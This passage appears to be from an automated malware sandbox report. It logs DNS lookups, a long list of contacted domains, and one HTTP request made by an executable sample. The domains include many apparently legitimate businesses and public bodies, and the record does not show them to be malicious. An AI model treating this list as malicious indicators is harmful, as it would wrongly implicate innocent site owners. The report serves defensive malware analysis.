                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.646380901 CEST8.8.8.8192.168.2.40x5fafNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.660901070 CEST8.8.8.8192.168.2.40xf0b6No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.718420029 CEST8.8.8.8192.168.2.40xe3a4No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.749881029 CEST8.8.8.8192.168.2.40x6964No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.847455978 CEST8.8.8.8192.168.2.40x2290No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:15.890479088 CEST8.8.8.8192.168.2.40x9cb8No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.100318909 CEST8.8.8.8192.168.2.40x360dNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.275923014 CEST8.8.8.8192.168.2.40x4cabNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.380136013 CEST8.8.8.8192.168.2.40x6d2fNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.415129900 CEST8.8.8.8192.168.2.40xf82aNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.415129900 CEST8.8.8.8192.168.2.40xf82aNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.415129900 CEST8.8.8.8192.168.2.40xf82aNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.670324087 CEST8.8.8.8192.168.2.40xc4e2No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.673738003 CEST8.8.8.8192.168.2.40xe2dbName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.703311920 CEST8.8.8.8192.168.2.40x2329No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.723639965 CEST8.8.8.8192.168.2.40x4dfcNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.734347105 CEST8.8.8.8192.168.2.40xed4cNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.737714052 CEST8.8.8.8192.168.2.40x7363Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.738526106 CEST8.8.8.8192.168.2.40x4928Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.754075050 CEST8.8.8.8192.168.2.40xf099No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.771814108 CEST8.8.8.8192.168.2.40x10ccName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.793606997 CEST8.8.8.8192.168.2.40x2802No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.806945086 CEST8.8.8.8192.168.2.40x237dNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.806945086 CEST8.8.8.8192.168.2.40x237dNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.806945086 CEST8.8.8.8192.168.2.40x237dNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.806945086 CEST8.8.8.8192.168.2.40x237dNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.810153961 CEST8.8.8.8192.168.2.40x3582No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.814799070 CEST8.8.8.8192.168.2.40x5a81No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.814799070 CEST8.8.8.8192.168.2.40x5a81No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.825670004 CEST8.8.8.8192.168.2.40xe2b7Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.829391956 CEST8.8.8.8192.168.2.40xe631No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.852879047 CEST8.8.8.8192.168.2.40xd1e6No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.856571913 CEST8.8.8.8192.168.2.40xa2a8Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.912442923 CEST8.8.8.8192.168.2.40x8856No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:16.964838982 CEST8.8.8.8192.168.2.40xde0cNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.010308981 CEST8.8.8.8192.168.2.40xed37No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.071959972 CEST8.8.8.8192.168.2.40x46b3No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.088316917 CEST8.8.8.8192.168.2.40x93faNo error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.130975008 CEST8.8.8.8192.168.2.40x8948No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.130975008 CEST8.8.8.8192.168.2.40x8948No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.143184900 CEST8.8.8.8192.168.2.40x6112No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.144224882 CEST8.8.8.8192.168.2.40x76dcNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.144224882 CEST8.8.8.8192.168.2.40x76dcNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.144224882 CEST8.8.8.8192.168.2.40x76dcNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.286125898 CEST8.8.8.8192.168.2.40xccfeNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.294126034 CEST8.8.8.8192.168.2.40xf967No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.373694897 CEST8.8.8.8192.168.2.40x1da6No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.373694897 CEST8.8.8.8192.168.2.40x1da6No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.373694897 CEST8.8.8.8192.168.2.40x1da6No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.403712988 CEST8.8.8.8192.168.2.40x2e78No error (0)k-nikko.com54.150.159.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.403712988 CEST8.8.8.8192.168.2.40x2e78No error (0)k-nikko.com52.199.213.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.423270941 CEST8.8.8.8192.168.2.40x321eNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.537333965 CEST8.8.8.8192.168.2.40x9afbNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.537417889 CEST8.8.8.8192.168.2.40x218fName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.559694052 CEST8.8.8.8192.168.2.40x4ecfName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.593236923 CEST8.8.8.8192.168.2.40xaa2eNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.597918034 CEST8.8.8.8192.168.2.40x827cName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.706374884 CEST8.8.8.8192.168.2.40x759dNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:17.912759066 CEST8.8.8.8192.168.2.40xfc28No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.021034956 CEST8.8.8.8192.168.2.40x294dServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.090184927 CEST8.8.8.8192.168.2.40xc93cNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.102410078 CEST8.8.8.8192.168.2.40x93ebServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.181173086 CEST8.8.8.8192.168.2.40x61d2No error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.183762074 CEST8.8.8.8192.168.2.40x2791Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.196022987 CEST8.8.8.8192.168.2.40x7e1dNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.225825071 CEST8.8.8.8192.168.2.40xaf82No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.243498087 CEST8.8.8.8192.168.2.40xf862No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.336755037 CEST8.8.8.8192.168.2.40x25bNo error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.336755037 CEST8.8.8.8192.168.2.40x25bNo error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.336755037 CEST8.8.8.8192.168.2.40x25bNo error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.493513107 CEST8.8.8.8192.168.2.40xadcNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.493513107 CEST8.8.8.8192.168.2.40xadcNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.493513107 CEST8.8.8.8192.168.2.40xadcNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.493513107 CEST8.8.8.8192.168.2.40xadcNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.615464926 CEST8.8.8.8192.168.2.40xb3a3No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.615464926 CEST8.8.8.8192.168.2.40xb3a3No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.759635925 CEST8.8.8.8192.168.2.40x7dbbNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.759635925 CEST8.8.8.8192.168.2.40x7dbbNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.918521881 CEST8.8.8.8192.168.2.40xb7dcNo error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:18.991502047 CEST8.8.8.8192.168.2.40xea81No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.036313057 CEST8.8.8.8192.168.2.40xcf7bNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.036313057 CEST8.8.8.8192.168.2.40xcf7bNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.036313057 CEST8.8.8.8192.168.2.40xcf7bNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.036313057 CEST8.8.8.8192.168.2.40xcf7bNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.096405029 CEST8.8.8.8192.168.2.40x1594No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.236681938 CEST8.8.8.8192.168.2.40xaf82No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.242187023 CEST8.8.8.8192.168.2.40x6658No error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.350670099 CEST8.8.8.8192.168.2.40x946Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.373111010 CEST8.8.8.8192.168.2.40x4146Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.407591105 CEST8.8.8.8192.168.2.40x4e0cName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.417023897 CEST8.8.8.8192.168.2.40x853bNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.490756989 CEST8.8.8.8192.168.2.40xd42fNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.530363083 CEST8.8.8.8192.168.2.40xd20dNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.650274038 CEST8.8.8.8192.168.2.40x6cceNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.650274038 CEST8.8.8.8192.168.2.40x6cceNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.683650970 CEST8.8.8.8192.168.2.40x25d6No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.787842035 CEST8.8.8.8192.168.2.40x6a3aName error (3)workplus.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.829627991 CEST8.8.8.8192.168.2.40x44bfNo error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.855961084 CEST8.8.8.8192.168.2.40x4ac6No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.855961084 CEST8.8.8.8192.168.2.40x4ac6No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.859040976 CEST8.8.8.8192.168.2.40x1594No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.859159946 CEST8.8.8.8192.168.2.40xf665No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:45:19.924976110 CEST8.8.8.8192.168.2.40x2243No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    • hyab.se
                                                                                                                                                                                                                                                                    • pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                    • orlyhotel.com
                                                                                                                                                                                                                                                                    • nts-web.net
                                                                                                                                                                                                                                                                    • dataform.co.uk
                                                                                                                                                                                                                                                                    • www.ftchat.com
                                                                                                                                                                                                                                                                    • www.dgmna.com
                                                                                                                                                                                                                                                                    • www.jenco.co.uk
                                                                                                                                                                                                                                                                    • www.olras.com
                                                                                                                                                                                                                                                                    • www.valdal.com
                                                                                                                                                                                                                                                                    • www.pdqhomes.com
                                                                                                                                                                                                                                                                    • www.quadlock.com
                                                                                                                                                                                                                                                                    • www.alteor.cl
                                                                                                                                                                                                                                                                    • www.wkhk.net
                                                                                                                                                                                                                                                                    • www.baijaku.com
                                                                                                                                                                                                                                                                    • www.pr-park.com
                                                                                                                                                                                                                                                                    • www.item-pr.com
                                                                                                                                                                                                                                                                    • www.rs-ag.com
                                                                                                                                                                                                                                                                    • www.elpro.si
                                                                                                                                                                                                                                                                    • www.credo.edu.pl
                                                                                                                                                                                                                                                                    • www.depalo.com
                                                                                                                                                                                                                                                                    • www.transsib.com
                                                                                                                                                                                                                                                                    • www.nunomira.com
                                                                                                                                                                                                                                                                    • www.vazir.se
                                                                                                                                                                                                                                                                    • www.tvtools.fi
                                                                                                                                                                                                                                                                    • www.otena.com
                                                                                                                                                                                                                                                                    • www.petsfan.com
                                                                                                                                                                                                                                                                    • www.abart.pl
                                                                                                                                                                                                                                                                    • www.mqs.com.br
                                                                                                                                                                                                                                                                    • www.evcpa.com
                                                                                                                                                                                                                                                                    • www.vexcom.com
                                                                                                                                                                                                                                                                    • www.t-tre.com
                                                                                                                                                                                                                                                                    • www.naoi-a.com
                                                                                                                                                                                                                                                                    • www.abdg.com
                                                                                                                                                                                                                                                                    • www.xaicom.es
                                                                                                                                                                                                                                                                    • www.sjbs.org
                                                                                                                                                                                                                                                                    • www.hummer.hu
                                                                                                                                                                                                                                                                    • www.ora.ecnet.jp
                                                                                                                                                                                                                                                                    • www.cokocoko.com
                                                                                                                                                                                                                                                                    • www.synetik.net
                                                                                                                                                                                                                                                                    • www.nelipak.nl
                                                                                                                                                                                                                                                                    • www.waldi.pl
                                                                                                                                                                                                                                                                    • www.iamdirt.com
                                                                                                                                                                                                                                                                    • www.aevga.com
                                                                                                                                                                                                                                                                    • www.maktraxx.com
                                                                                                                                                                                                                                                                    • www.edimart.hu
                                                                                                                                                                                                                                                                    • www.wifi4all.nl
                                                                                                                                                                                                                                                                    • www.speelhal.net
                                                                                                                                                                                                                                                                    • www.holleman.us
                                                                                                                                                                                                                                                                    • www.yocinc.org
                                                                                                                                                                                                                                                                    • www.stnic.co.uk
                                                                                                                                                                                                                                                                    • www.cel-cpa.com
                                                                                                                                                                                                                                                                    • www.fe-bauer.de
                                                                                                                                                                                                                                                                    • www.vitaindu.com
                                                                                                                                                                                                                                                                    • www.koz1.net
                                                                                                                                                                                                                                                                    • www.pcgrate.com
                                                                                                                                                                                                                                                                    • www.valselit.com
                                                                                                                                                                                                                                                                    • www.netcr.com
                                                                                                                                                                                                                                                                    • www.mobilnic.net
                                                                                                                                                                                                                                                                    • www.2print.com
                                                                                                                                                                                                                                                                    • www.lrsuk.com
                                                                                                                                                                                                                                                                    • www.x0c.com
                                                                                                                                                                                                                                                                    • www.fink.com
                                                                                                                                                                                                                                                                    • www.pupi.cz
                                                                                                                                                                                                                                                                    • www.findbc.com
                                                                                                                                                                                                                                                                    • www.gpthink.com
                                                                                                                                                                                                                                                                    • www.fcwcvt.org
                                                                                                                                                                                                                                                                    • www.c9dd.com
                                                                                                                                                                                                                                                                    • www.nqks.com
                                                                                                                                                                                                                                                                    • www.snugpak.com
                                                                                                                                                                                                                                                                    • www.domon.com
                                                                                                                                                                                                                                                                    • www.myropcb.com
                                                                                                                                                                                                                                                                    • www.pwd.org
                                                                                                                                                                                                                                                                    • www.yoruksut.com
                                                                                                                                                                                                                                                                    • www.kernsafe.com
                                                                                                                                                                                                                                                                    • www.medius.si
                                                                                                                                                                                                                                                                    • www.ka-mo-me.com
                                                                                                                                                                                                                                                                    • www.com-sit.com
                                                                                                                                                                                                                                                                    • www.jchysk.com
                                                                                                                                                                                                                                                                    • www.dayvo.com
                                                                                                                                                                                                                                                                    • www.crcsi.org
                                                                                                                                                                                                                                                                    • www.stajum.com
                                                                                                                                                                                                                                                                    • www.ora-ito.com
                                                                                                                                                                                                                                                                    • www.railbook.net
                                                                                                                                                                                                                                                                    • www.tyrns.com
                                                                                                                                                                                                                                                                    • www.spanesi.com
                                                                                                                                                                                                                                                                    • www.tc17.com
                                                                                                                                                                                                                                                                    • www.fnsds.org
                                                                                                                                                                                                                                                                    • www.pohlfood.com
                                                                                                                                                                                                                                                                    • www.11tochi.net
                                                                                                                                                                                                                                                                    • www.pb-games.com
                                                                                                                                                                                                                                                                    • www.sclover3.com
                                                                                                                                                                                                                                                                    • canasil.com
                                                                                                                                                                                                                                                                    • captlfix.com
                                                                                                                                                                                                                                                                    • riwn.org
                                                                                                                                                                                                                                                                    • msl-lock.com
                                                                                                                                                                                                                                                                    • dzm.cz
                                                                                                                                                                                                                                                                    • lpver.com
                                                                                                                                                                                                                                                                    • nels.co.uk
                                                                                                                                                                                                                                                                    • metaforacom.com
                                                                                                                                                                                                                                                                    • araax.com
                                                                                                                                                                                                                                                                    • indonesiamedia.com
                                                                                                                                                                                                                                                                    • mijash3.com
                                                                                                                                                                                                                                                                    • banvari.com
                                                                                                                                                                                                                                                                    • insia.com
                                                                                                                                                                                                                                                                    • gcss.com
                                                                                                                                                                                                                                                                    • e-kami.net
                                                                                                                                                                                                                                                                    • dyag-eng.com
                                                                                                                                                                                                                                                                    • ramkome.com
                                                                                                                                                                                                                                                                    • top1oil.com
                                                                                                                                                                                                                                                                    • nettle.pl
                                                                                                                                                                                                                                                                    • akr.co.id
                                                                                                                                                                                                                                                                    • bible.org
                                                                                                                                                                                                                                                                    • 603888.com
                                                                                                                                                                                                                                                                    • cbaben.com
                                                                                                                                                                                                                                                                    • shztm.ru
                                                                                                                                                                                                                                                                    • zupraha.cz
                                                                                                                                                                                                                                                                    • strazynski.pl
                                                                                                                                                                                                                                                                    • tcpoa.com
                                                                                                                                                                                                                                                                    • smitko.net
                                                                                                                                                                                                                                                                    • isom.org
                                                                                                                                                                                                                                                                    • sigtoa.com
                                                                                                                                                                                                                                                                    • dhh.la.gov
                                                                                                                                                                                                                                                                    • cjborden.com
                                                                                                                                                                                                                                                                    • likangds.com
                                                                                                                                                                                                                                                                    • leapc.com
                                                                                                                                                                                                                                                                    • atb-lit.com
                                                                                                                                                                                                                                                                    • missnue.com
                                                                                                                                                                                                                                                                    • daytonir.com
                                                                                                                                                                                                                                                                    • magicomm.co.uk
                                                                                                                                                                                                                                                                    • ludomemo.com
                                                                                                                                                                                                                                                                    • simetar.com
                                                                                                                                                                                                                                                                    • hchc.org
                                                                                                                                                                                                                                                                    • adeesa.net
                                                                                                                                                                                                                                                                    • pellys.co.uk
                                                                                                                                                                                                                                                                    • fogra.com.pl
                                                                                                                                                                                                                                                                    • yoruksut.com
                                                                                                                                                                                                                                                                    • vivastay.com
                                                                                                                                                                                                                                                                    • wanoa.com
                                                                                                                                                                                                                                                                    • apcotex.com
                                                                                                                                                                                                                                                                    • kumaden.com
                                                                                                                                                                                                                                                                    • sinwal.com
                                                                                                                                                                                                                                                                    • tabbles.net
                                                                                                                                                                                                                                                                    • lyto.net
                                                                                                                                                                                                                                                                    • www.jacomfg.com
                                                                                                                                                                                                                                                                    • touchfam.ca
                                                                                                                                                                                                                                                                    • onzcda.com
                                                                                                                                                                                                                                                                    • cvswl.org
                                                                                                                                                                                                                                                                    • dspears.com
                                                                                                                                                                                                                                                                    • valselit.com
                                                                                                                                                                                                                                                                    • envogen.com
                                                                                                                                                                                                                                                                    • wantapc.net
                                                                                                                                                                                                                                                                    • cutchie.com
                                                                                                                                                                                                                                                                    • burstner.ru
                                                                                                                                                                                                                                                                    • shesfit.com
                                                                                                                                                                                                                                                                    • vvsteknik.dk
                                                                                                                                                                                                                                                                    • zemarmot.net
                                                                                                                                                                                                                                                                    • wolffkran.de
                                                                                                                                                                                                                                                                    • oozkranj.com
                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    0192.168.2.450309188.114.96.7443C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: hyab.se
                                                                                                                                                                                                                                                                    2023-07-27 19:44:40 UTC0INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:44:40 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Location: https://hyab.com
                                                                                                                                                                                                                                                                    Cache-Control: max-age=600
                                                                                                                                                                                                                                                                    Expires: Thu, 27 Jul 2023 19:54:40 GMT
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AtxR%2BuqA7%2Fb3dCF5McoxuzzOcgDqJvEN9EdkL0Cmqt%2FlLKx7FB87YZ1DNofEYhagjPgKJwFlPk1K3K16jDdBBqx6NBaMwbONCJkkCprccQbJ1kWCkXrMPRZe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 7ed760df5b7bbb3d-FRA
                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
